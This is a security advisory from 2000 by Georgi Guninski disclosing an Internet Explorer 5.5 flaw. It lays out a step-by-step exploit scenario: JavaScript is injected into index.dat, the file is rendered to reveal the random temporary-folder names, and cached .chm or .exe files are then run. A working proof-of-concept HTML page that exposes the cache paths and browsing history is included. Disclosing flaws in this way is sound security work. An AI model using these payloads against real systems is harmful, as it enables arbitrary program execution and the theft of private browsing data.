Georgi Guninski security advisory #29, 2000
OBJECT TYPE="text/html" may allow executing arbitrary programs in IE
5.5
Systems affected:
IE 5.5 probably 5.x and Outlook/Outlook Express, have not tested
Risk: High
Date: 23 November 2000
Legal Notice:
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute
it unmodified.
You may not modify it and distribute it or distribute parts of it without
the author's
written permission.
Disclaimer:
The opinions expressed in this advisory and program are my own and
not of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use
of the information
or functionality provided by this advisory or program.
Georgi Guninski, bears no responsibility for content or misuse of this
advisory or program or any derivatives thereof.
Description:
Note: This is completely different issue from Advisory #28 "IE 5.x/Outlook
allows executing arbitrary programs using .chm files and temporary internet
files folder"
though both use some common stuff.
There is a security vulnerability in IE 5.5 (probably 5.x and Outlook)
which allows
executing arbitratrary programs using OBJECT TYPE="text/html" and parsing
index.dat
by revealing the location of temporary internet files folder.
This may lead to taking full control over user's computer.
Details:
Backround:
If one can inject a file on user's local disk and know its location
it is possible to execute
arbitrary programs in at least two ways:
1) window.showHelp("c:\\dir\\hostile.chm")
2) <OBJECT CLASSID="clsid:000000000-0000-0000-00000-000000000002"
CODEBASE="C:\DIR\HOSTILE.EXE">
So the question arise how to inject a specified file on user's disk.
A good way is to use the Temporary Internet Files Folder which contain
cached documents and files.
The problem with it is there are several subfolders with random names.
But there is a special file "index.dat" which is something like a catalog
or registry which
contains all visited URLs and which is more important the names of
the random folders in its beginning.
It is locatated in C:/WINDOWS/Temporary Internet Files/Content.IE5/
under Win9x and in
C:/Documents and Settings/USERNAME/Local Settings/Temporary Internet
Files/Content.IE5/
under Win2K - so under Win2K the username of the current user must
be known or guessed which makes things more difficult.
It is possible to inject JavaScript in it by just doing:
window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")
because this URL shall be written in it.
So if it can be parsed by IE and the JavaScript be executed the names
of the random folders will be known.
But Microsoft tries to prevent parsing non-HTML files and they have
issued a security bulletin in August:
http://www.microsoft.com/technet/security/bulletin/MS00-055.asp
But it is possible to parse (render) non-HTML files in the following
way:
<OBJECT TYPE="text/html" DATA="file://c:/file.dat"></OBJECT>
So the exploit scenario is:
1) inject JavaScript in index.dat by window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")
The JavaScript is executed in index.dat and has access to its content,
which allow to find the random directory names
2) parse/render index.dat by:
<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat"
TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>
3) After the Temporary internet Files Folders are known inject for
example chm files by:
<OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>
4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");
The presense of the random temporary internet files folders in index.dat
is very dangerous - it means that every Cross Frame Security vulnerability
or vulnerability that reads local files may lead to executing arbitrary
programs. This means that a lot of my previous vulnerabilities are much
more serious that I have realized then.
The code is:
--------parsedat.html------------------------------------------------
This demo is for
Windows 9x - you must modify the source for Win2K.
You may need to
wait a few minutes if you have slow computer. If you have Pentium 500 or
better
or use Win2K probably
much less.
It is expected a
window with location "about:blank" to be opened containing index.dat -
the file where the
random names of temporary internet files directories are kept
(they are random
names in the beginning of the window) and the list of all visited URLs
among other stuff.
Once the temporary internet files directories are know it is possible to
execute arbitrary
programs thru cached files and showHelp() or OBJECT CODEBASE="...".
If you don't see
a window with location "about:blank" and content of index.dat close IE
and
visit the page again.
<SCRIPT>
b=window.open("http://www.guninski.com/empty2.html?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
s='<OBJECT DATA="file://C:/WINDOWS/Temporary
Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
//s='<OBJECT
DATA="file://C:/Documents and Settings/Administrator/Local Settings/Temporary
Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
// ^^^ This is for
Win2K ------------you must change "Administrator" to the actual user name
setTimeout("document.writeln(s)",5000);
</SCRIPT>
---------------------------------------------------------------------
|
Workaround:
Disable Active Scripting and move the location of the Temporary Internet
Files Folder to
unpredicatable location
Demonstration which opens index.dat which contains the Temporary Internet
Files Folders and
the list of all visited URLs is available:
http://www.guninski.com/parsedat.html
Vendor status:
Microsoft was contacted on 15 November 2000. |